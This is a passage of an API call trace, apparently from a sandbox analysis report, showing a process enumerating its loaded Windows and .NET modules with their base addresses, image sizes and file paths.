"c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll")) returned 0x77 [0145.337] CoTaskMemFree (pv=0x55b0d0) [0145.337] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73db0000, lpmodinfo=0x23f4990, cb=0xc | out: lpmodinfo=0x23f4990*(lpBaseOfDll=0x73db0000, SizeOfImage=0x1d000, EntryPoint=0x73db3b10)) returned 1 [0145.374] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.374] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73db0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0145.375] CoTaskMemFree (pv=0x55b0d0) [0145.375] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.375] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73db0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")) returned 0x1e [0145.376] CoTaskMemFree (pv=0x55b0d0) [0145.376] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66320000, lpmodinfo=0x23f6a9c, cb=0xc | out: lpmodinfo=0x23f6a9c*(lpBaseOfDll=0x66320000, SizeOfImage=0x721000, EntryPoint=0x0)) returned 1 [0145.376] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.376] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66320000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0145.377] CoTaskMemFree (pv=0x55b0d0) [0145.377] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.377] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66320000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")) returned 0x6e [0145.378] CoTaskMemFree (pv=0x55b0d0) [0145.378] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66220000, lpmodinfo=0x23f8c58, cb=0xc | out: lpmodinfo=0x23f8c58*(lpBaseOfDll=0x66220000, SizeOfImage=0xf1000, EntryPoint=0x0)) returned 1 [0145.379] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.379] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66220000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Configuration.ni.dll") returned 0x1b [0145.380] CoTaskMemFree (pv=0x55b0d0) [0145.380] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.380] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66220000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\fe4b221b4109f0c78f57a792500699b5\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\fe4b221b4109f0c78f57a792500699b5\\system.configuration.ni.dll")) returned 0x80 [0145.381] CoTaskMemFree (pv=0x55b0d0) [0145.381] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65b00000, lpmodinfo=0x23fae48, cb=0xc | out: lpmodinfo=0x23fae48*(lpBaseOfDll=0x65b00000, SizeOfImage=0x71e000, EntryPoint=0x0)) returned 1 [0145.383] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.383] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65b00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Xml.ni.dll") returned 0x11 [0145.384] CoTaskMemFree (pv=0x55b0d0) [0145.384] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.384] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65b00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\4fbda26d781323081b45526da6e87b35\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\4fbda26d781323081b45526da6e87b35\\system.xml.ni.dll")) returned 0x6c [0145.386] CoTaskMemFree (pv=0x55b0d0) [0145.386] GetModuleInformation (in: hProcess=0x2a0, hModule=0x764d0000, lpmodinfo=0x23fcffc, cb=0xc | out: lpmodinfo=0x23fcffc*(lpBaseOfDll=0x764d0000, SizeOfImage=0x6000, EntryPoint=0x764d1460)) returned 1 [0145.387] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.387] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x764d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0145.388] CoTaskMemFree (pv=0x55b0d0) [0145.388] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.388] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x764d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0145.389] CoTaskMemFree (pv=0x55b0d0) [0145.389] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a50000, lpmodinfo=0x23ff100, cb=0xc | out: lpmodinfo=0x23ff100*(lpBaseOfDll=0x65a50000, SizeOfImage=0xa5000, EntryPoint=0x65a6ac50)) returned 1 [0145.390] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.390] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rasapi32.dll") returned 0xc [0145.391] CoTaskMemFree (pv=0x55b0d0) [0145.391] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.391] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll")) returned 0x20 [0145.392] CoTaskMemFree (pv=0x55b0d0) [0145.392] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a20000, lpmodinfo=0x2401214, cb=0xc | out: lpmodinfo=0x2401214*(lpBaseOfDll=0x65a20000, SizeOfImage=0x23000, EntryPoint=0x65a25570)) returned 1 [0145.393] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.393] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a20000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rasman.dll") returned 0xa [0145.394] CoTaskMemFree (pv=0x55b0d0) [0145.394] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.394] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a20000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll")) returned 0x1e [0145.395] CoTaskMemFree (pv=0x55b0d0) [0145.395] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a10000, lpmodinfo=0x2403320, cb=0xc | out: lpmodinfo=0x2403320*(lpBaseOfDll=0x65a10000, SizeOfImage=0x10000, EntryPoint=0x65a13820)) returned 1 [0145.396] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.396] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a10000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rtutils.dll") returned 0xb [0145.397] CoTaskMemFree (pv=0x55b0d0) [0145.397] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.397] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a10000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll")) returned 0x1f [0145.399] CoTaskMemFree (pv=0x55b0d0) [0145.399] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f30000, lpmodinfo=0x240542c, cb=0xc | out: lpmodinfo=0x240542c*(lpBaseOfDll=0x73f30000, SizeOfImage=0x5f000, EntryPoint=0x73f34af0)) returned 1 [0145.399] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.399] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f30000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ws2_32.dll") returned 0xa [0145.401] CoTaskMemFree (pv=0x55b0d0) [0145.401] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.401] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f30000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")) returned 0x1e [0145.402] CoTaskMemFree (pv=0x55b0d0) [0145.402] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71400000, lpmodinfo=0x2407538, cb=0xc | out: lpmodinfo=0x2407538*(lpBaseOfDll=0x71400000, SizeOfImage=0x4f000, EntryPoint=0x7140d850)) returned 1 [0145.403] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.403] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71400000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0145.404] CoTaskMemFree (pv=0x55b0d0) [0145.404] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.404] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71400000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")) returned 0x1f [0145.405] CoTaskMemFree (pv=0x55b0d0) [0145.405] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71450000, lpmodinfo=0x2409644, cb=0xc | out: lpmodinfo=0x2409644*(lpBaseOfDll=0x71450000, SizeOfImage=0x9b000, EntryPoint=0x7148f7e0)) returned 1 [0145.406] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.406] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71450000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="winhttp.dll") returned 0xb [0145.407] CoTaskMemFree (pv=0x55b0d0) [0145.407] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.407] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71450000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll")) returned 0x1f [0145.408] CoTaskMemFree (pv=0x55b0d0) [0145.408] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71520000, lpmodinfo=0x240b750, cb=0xc | out: lpmodinfo=0x240b750*(lpBaseOfDll=0x71520000, SizeOfImage=0x12000, EntryPoint=0x71524510)) returned 1 [0145.409] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.409] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71520000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ondemandconnroutehelper.dll") returned 0x1b [0145.410] CoTaskMemFree (pv=0x55b0d0) [0145.410] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.410] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71520000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ondemandconnroutehelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll")) returned 0x2f [0145.411] CoTaskMemFree (pv=0x55b0d0) [0145.411] GetModuleInformation (in: hProcess=0x2a0, hModule=0x714f0000, lpmodinfo=0x240d89c, cb=0xc | out: lpmodinfo=0x240d89c*(lpBaseOfDll=0x714f0000, SizeOfImage=0x2f000, EntryPoint=0x714fbb70)) returned 1 [0145.412] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.412] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x714f0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0145.413] CoTaskMemFree (pv=0x55b0d0) [0145.413] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.413] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x714f0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")) returned 0x20 [0145.414] CoTaskMemFree (pv=0x55b0d0) [0145.414] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76900000, lpmodinfo=0x240f9b0, cb=0xc | out: lpmodinfo=0x240f9b0*(lpBaseOfDll=0x76900000, SizeOfImage=0x7000, EntryPoint=0x76901e10)) returned 1 [0145.415] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.415] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76900000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0145.421] CoTaskMemFree (pv=0x55b0d0) [0145.421] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.421] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76900000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NSI.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")) returned 0x1b [0145.422] CoTaskMemFree (pv=0x55b0d0) [0145.422] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a860000, lpmodinfo=0x2411aac, cb=0xc | out: lpmodinfo=0x2411aac*(lpBaseOfDll=0x6a860000, SizeOfImage=0x13000, EntryPoint=0x6a8625d0)) returned 1 [0145.423] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.423] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a860000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0145.424] CoTaskMemFree (pv=0x55b0d0) [0145.424] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.424] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a860000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll")) returned 0x21 [0145.425] CoTaskMemFree (pv=0x55b0d0) [0145.425] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a840000, lpmodinfo=0x2413bc0, cb=0xc | out: lpmodinfo=0x2413bc0*(lpBaseOfDll=0x6a840000, SizeOfImage=0x14000, EntryPoint=0x6a843c10)) returned 1 [0145.426] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.426] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a840000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0145.427] CoTaskMemFree (pv=0x55b0d0) [0145.427] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.427] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a840000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll")) returned 0x20 [0145.428] CoTaskMemFree (pv=0x55b0d0) [0145.428] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74eb0000, lpmodinfo=0x2415cd4, cb=0xc | out: lpmodinfo=0x2415cd4*(lpBaseOfDll=0x74eb0000, SizeOfImage=0x13ff000, EntryPoint=0x7506b990)) returned 1 [0145.429] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.429] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74eb0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="shell32.dll") returned 0xb [0145.431] CoTaskMemFree (pv=0x55b0d0) [0145.431] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.431] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74eb0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0145.433] CoTaskMemFree (pv=0x55b0d0) [0145.433] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76800000, lpmodinfo=0x2417de0, cb=0xc | out: lpmodinfo=0x2417de0*(lpBaseOfDll=0x76800000, SizeOfImage=0x37000, EntryPoint=0x76803b50)) returned 1 [0145.434] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.434] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76800000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="cfgmgr32.dll") returned 0xc [0145.435] CoTaskMemFree (pv=0x55b0d0) [0145.435] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.435] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76800000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")) returned 0x20 [0145.437] CoTaskMemFree (pv=0x55b0d0) [0145.437] GetModuleInformation (in: hProcess=0x2a0, hModule=0x745b0000, lpmodinfo=0x2419ef4, cb=0xc | out: lpmodinfo=0x2419ef4*(lpBaseOfDll=0x745b0000, SizeOfImage=0x4f9000, EntryPoint=0x747b7610)) returned 1 [0145.438] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.438] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x745b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="windows.storage.dll") returned 0x13 [0145.439] CoTaskMemFree (pv=0x55b0d0) [0145.439] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.439] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x745b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")) returned 0x27 [0145.440] CoTaskMemFree (pv=0x55b0d0) [0145.440] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74520000, lpmodinfo=0x241c020, cb=0xc | out: lpmodinfo=0x241c020*(lpBaseOfDll=0x74520000, SizeOfImage=0x8d000, EntryPoint=0x74569b90)) returned 1 [0145.442] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.442] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74520000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="shcore.dll") returned 0xa [0145.443] CoTaskMemFree (pv=0x55b0d0) [0145.443] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.443] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74520000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shcore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")) returned 0x1e [0145.444] CoTaskMemFree (pv=0x55b0d0) [0145.444] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76470000, lpmodinfo=0x241e12c, cb=0xc | out: lpmodinfo=0x241e12c*(lpBaseOfDll=0x76470000, SizeOfImage=0x44000, EntryPoint=0x76477410)) returned 1 [0145.445] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.445] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76470000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="powrprof.dll") returned 0xc [0145.447] CoTaskMemFree (pv=0x55b0d0) [0145.447] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.447] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76470000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")) returned 0x20 [0145.448] CoTaskMemFree (pv=0x55b0d0) [0145.449] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f20000, lpmodinfo=0x2420240, cb=0xc | out: lpmodinfo=0x2420240*(lpBaseOfDll=0x73f20000, SizeOfImage=0xf000, EntryPoint=0x73f22e40)) returned 1 [0145.450] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.450] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f20000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0145.451] CoTaskMemFree (pv=0x55b0d0) [0145.451] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.451] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f20000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")) returned 0x1f [0145.452] CoTaskMemFree (pv=0x55b0d0) [0145.452] GetModuleInformation (in: hProcess=0x2a0, hModule=0x70a50000, lpmodinfo=0x242234c, cb=0xc | out: lpmodinfo=0x242234c*(lpBaseOfDll=0x70a50000, SizeOfImage=0x84000, EntryPoint=0x70a76530)) returned 1 [0145.454] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.454] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x70a50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0145.455] CoTaskMemFree (pv=0x55b0d0) [0145.455] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.455] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x70a50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\DNSAPI.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")) returned 0x1e [0145.456] CoTaskMemFree (pv=0x55b0d0) [0145.456] GetModuleInformation (in: hProcess=0x2a0, hModule=0x713f0000, lpmodinfo=0x2424458, cb=0xc | out: lpmodinfo=0x2424458*(lpBaseOfDll=0x713f0000, SizeOfImage=0x8000, EntryPoint=0x713f1fc0)) returned 1 [0145.458] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.458] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x713f0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0145.459] CoTaskMemFree (pv=0x55b0d0) [0145.459] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.459] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x713f0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\WINNSI.DLL" (normalized: "c:\\windows\\syswow64\\winnsi.dll")) returned 0x1e [0145.460] CoTaskMemFree (pv=0x55b0d0) [0145.460] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6fa30000, lpmodinfo=0x2426564, cb=0xc | out: lpmodinfo=0x2426564*(lpBaseOfDll=0x6fa30000, SizeOfImage=0x8000, EntryPoint=0x6fa31920)) returned 1 [0145.462] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.462] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6fa30000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rasadhlp.dll") returned 0xc [0145.485] CoTaskMemFree (pv=0x55b0d0) [0145.485] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.485] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6fa30000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")) returned 0x20 [0145.486] CoTaskMemFree (pv=0x55b0d0) [0145.486] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f9e0000, lpmodinfo=0x2428678, cb=0xc | out: lpmodinfo=0x2428678*(lpBaseOfDll=0x6f9e0000, SizeOfImage=0x47000, EntryPoint=0x6f9f58d0)) returned 1 [0145.487] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.487] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f9e0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0145.489] CoTaskMemFree (pv=0x55b0d0) [0145.489] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.489] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f9e0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\fwpuclnt.dll" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")) returned 0x20 [0145.490] CoTaskMemFree (pv=0x55b0d0) [0145.490] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71540000, lpmodinfo=0x242a78c, cb=0xc | out: lpmodinfo=0x242a78c*(lpBaseOfDll=0x71540000, SizeOfImage=0x1b000, EntryPoint=0x71549050)) returned 1 [0145.492] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.492] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71540000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0145.493] CoTaskMemFree (pv=0x55b0d0) [0145.493] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.493] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71540000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0145.502] CoTaskMemFree (pv=0x55b0d0) [0145.502] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6fdf0000, lpmodinfo=0x242c898, cb=0xc | out: lpmodinfo=0x242c898*(lpBaseOfDll=0x6fdf0000, SizeOfImage=0xa000, EntryPoint=0x6fdf3200)) returned 1 [0145.503] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.504] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6fdf0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0145.505] CoTaskMemFree (pv=0x55b0d0) [0145.505] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.505] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6fdf0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll")) returned 0x1f [0145.506] CoTaskMemFree (pv=0x55b0d0) [0145.506] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f970000, lpmodinfo=0x242e9a4, cb=0xc | out: lpmodinfo=0x242e9a4*(lpBaseOfDll=0x6f970000, SizeOfImage=0x64000, EntryPoint=0x6f98afd0)) returned 1 [0145.507] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.507] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f970000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="schannel.dll") returned 0xc [0145.508] CoTaskMemFree (pv=0x55b0d0) [0145.508] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.509] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f970000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll")) returned 0x20 [0145.510] CoTaskMemFree (pv=0x55b0d0) [0145.511] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f90000, lpmodinfo=0x2430ab8, cb=0xc | out: lpmodinfo=0x2430ab8*(lpBaseOfDll=0x73f90000, SizeOfImage=0x178000, EntryPoint=0x73fe8a90)) returned 1 [0145.512] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.512] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f90000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0145.513] CoTaskMemFree (pv=0x55b0d0) [0145.513] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.513] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f90000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPT32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")) returned 0x1f [0145.514] CoTaskMemFree (pv=0x55b0d0) [0145.514] GetModuleInformation (in: hProcess=0x2a0, hModule=0x764c0000, lpmodinfo=0x2432bc4, cb=0xc | out: lpmodinfo=0x2432bc4*(lpBaseOfDll=0x764c0000, SizeOfImage=0xe000, EntryPoint=0x764c5410)) returned 1 [0145.515] 